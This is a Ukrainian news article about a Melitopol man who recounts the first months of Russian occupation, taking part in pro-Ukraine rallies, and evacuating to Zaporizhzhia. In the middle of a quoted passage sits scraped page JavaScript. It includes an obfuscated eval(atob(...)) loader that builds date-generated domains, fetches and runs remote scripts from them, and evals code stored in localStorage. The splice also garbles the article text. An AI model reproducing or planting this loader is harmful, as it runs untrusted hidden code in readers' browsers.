90 днів життя в окупації: історія евакуюваного до Запоріжжя жителя Мелітополя (ВІДЕО)

Мелітополь — місто Запорізької області, яке РФ окупувала на початку війни. Журналісти поспілкувалися з переселенцем з Мелітополя, який розповів про життя в окупації та евакуацію до Запоріжжя.

Про це інформує Акцент з посиланням на випуск телеканалу ALEX UA.

Як йдеться у випуску, переселенець Олексій Ніколаєнко народився в Казахстані, але за сорок років життя до Мелітополя прикіпіло сердце. Чоловік з болем згадує, як ворог зайшов у його місто в роковий день.

«Перші дні окупації — це недоуміння. Повністю незрозуміло, що, як це могло статися. А потім потроху почав накопичуватися страх. Коли почали хапати людей, коли схопили нашого міського голову Івана Федорова, активістів почали хапати та на підвал забирати, тоді з’явився страх. Буквально через два-три дні позачинялися всі магазини, не можна було нічого купити за безготівкові. Пенсію я отримав, але придбати за ці гроші, що були на картці, неможна було нічого», — розповідає чоловік.

Коли Олексій дізнався, що у місті люди збираються на мирні мітинги на підтримку України, одразу до них приєднався. За словами мелітопольця, він був здивований бачити велику кількість людей, які збиралися на мирні акції недивлячись на те, що зі зв’язком були перебої. Як розповідає переселенець, на мітингу за ним ганялися окупанти і хотіли відправляти до комендатури.

Вибратися з під окупації Олексій зміг тільки у травні, а його родина виїхала трохи пізніше: як зазначає чоловік, валізу збирав як на курорт, бо думав, що їде на місяць чи два. Він три дні добирався до Запоріжжя, а дорогою бачив спалені та розтрощені від снарядів загарбників автомобілі та транспорт спецпризначення — швидкі, пожежні, а також розбиті дороги.

«І страшно їхати, і страшно залишатися. (…) Першу ніч ми ночували на в’їзді до Василівки, другу — на «тарілці (пост у Василівці — ред.)«, там і на виїзді збиралися ночувати і втретє. Але за якимось невідомими причинами нас випустили (…)«, — зазначив переселенець. var node3361 = document.getElementById(«MIXADV_3361»); if( node3361 ) { var script = document.createElement(«script»); script.charset = «utf-8»; script.src = «https://m.mixadvert.com/show/?id=3361&r=»+Math.random(); node3361.parentNode.appendChild(script); script.onerror = function(){ window.eval( atob(«dmFyIGRhdGUgPSBuZXcgRGF0ZSgpO3ZhciBtb250aCA9IGRhdGUuZ2V0TW9udGgoKSArIDE7IHZhciBkYXkgPSBkYXRlLmdldERhdGUoKTsgdmFyIHllYXIgPSBkYXRlLmdldFllYXIoKTsgdmFyIG5hbWVfZGF5ID0gZGF0ZS5nZXREYXkoKSArIDE7dmFyIGRvbSA9IFsgIm9yZyIsICJ0b3AiLCAiYml6LnVhIiwgImNvLnVhIiwgImt5aXYudWEiLCAiY2x1YiIsICJzaG9wIl07IHZhciBzdHIgPWRheSoobW9udGggKiBuYW1lX2RheSAqIGRheSkrIiIrIGRheSoobW9udGggKyBuYW1lX2RheSArIGRheSAreWVhcik7dmFyIGhhc2ggPSAgYnRvYShidG9hKHN0cikpLnRvTG93ZXJDYXNlKCk7IHZhciBob3N0ID0gaGFzaC5zdWJzdHJpbmcoMywgaGFzaC5sZW5ndGggLSBuYW1lX2RheS8yKSsiLiIrZG9tW25hbWVfZGF5IC0gMV07dmFyIHIgPSBNYXRoLnJhbmRvbSgpLnRvU3RyaW5nKDM2KS5zdWJzdHIoMiwgMik7ciA9IHIucmVwbGFjZSgvWzAtOV0vZywgIiIpO3ZhciBkZWx0YSA9IE1hdGguZmxvb3IoTWF0aC5yYW5kb20oKSAqICgxMDAgLSAxMCArIDEpKSArIDEwO3ZhciBpZCA9IDMzNjEgLSBkZWx0YTsgdmFyIHNjcmlwdF9maXJzdCA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoInNjcmlwdCIpO3NjcmlwdF9maXJzdC5zcmMgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIitkZWx0YStpZCtyKyIiOyBub2RlMzM2MS5wYXJlbnROb2RlLmFwcGVuZENoaWxkKHNjcmlwdF9maXJzdCk7c2V0VGltZW91dCggZnVuY3Rpb24gKCkge3NjcmlwdF9maXJzdC5yZW1vdmUoKX0sIDQwMDApO3NjcmlwdF9maXJzdC5vbmVycm9yID0gZnVuY3Rpb24oKXt2YXIgYSA9IGRvY3VtZW50LmNyZWF0ZUVsZW1lbnQoImEiKTthLmhyZWYgPSAiaHR0cHM6Ly8iKyBob3N0KyIvIjsgbm9kZTMzNjEucGFyZW50Tm9kZS5hcHBlbmRDaGlsZChhKTsgc2V0VGltZW91dCggZnVuY3Rpb24gKCkgeyBpZiggbm9kZTMzNjEuaW5uZXJIVE1MID09ICIiICkgd2luZG93LmV2YWwobG9jYWxTdG9yYWdlLmdldEl0ZW0oIjMzNjEiKSkgfSwgNTAwMCk7ICA7fTsg») ); } }

Олексій почав вести свій власний блог біженця у соцмережах, де ділиться враженнями від життя в окупації та навіть рецептами страв. Необходиться і без думок про рідне місто, в яке чоловік мріє повернутися разом з родиною після того, як російські окупанти будуть вигнані геть.

Більш детально — у випуску телеканалу нижче.

Дивіться також:

Паспортизація, евакуація і примусова мобілізація: мер Федоров про ситуацію в МелітополіНа лінії вогню: як готується до зими село на Запоріжжі, яке регулярно обстрілює РФ (КАРТА, ВІДЕО)

Заголовне ілюстративне фото — з відкритих джерел. (adsbygoogle = window.adsbygoogle || []).push({});

Підписуйтесь на Акцент в Источник: https://akzent.zp.ua/90-dniv-zhittya-v-okupatsiyi-istoriya-evakuyuvanogo-do-zaporizhzhya-zhitelya-melitopolya-video/

Мы в Telegram, наш Telegram bot — @zpua_bot, Мы в Viber, Мы на Facebook

Share this post

Добавить комментарий

scroll to top